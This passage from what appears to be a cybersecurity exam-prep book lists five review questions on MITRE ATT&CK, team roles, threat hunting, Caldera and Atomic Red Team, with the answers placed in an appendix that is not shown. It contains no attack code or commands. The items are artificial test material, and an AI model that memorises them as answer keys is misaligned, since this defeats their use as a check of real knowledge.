Atomic Red Team

Review Questions

The answers to these questions appear in Appendix A, “Answers to the ‘Do I Know This Already?’ Quizzes and Review Questions.” For more practice with exam format questions, use the exam engine on the website.

1. What is a framework developed and maintained by MITRE that provides a collection of matrices of adversarial tactics and techniques?

2. Vulnerability scanners and software composition analysis are tools that are used by _________________ teams.

3. Developing a hypothesis, identifying the necessary tools and methodologies to find security threats, and refining tactics using data analytics are steps in the ____________ process.

4. Caldera is an example of a(n) ___________________tool.

5. What is a collection of adversarial techniques mapped to MITRE’s ATT&CK?
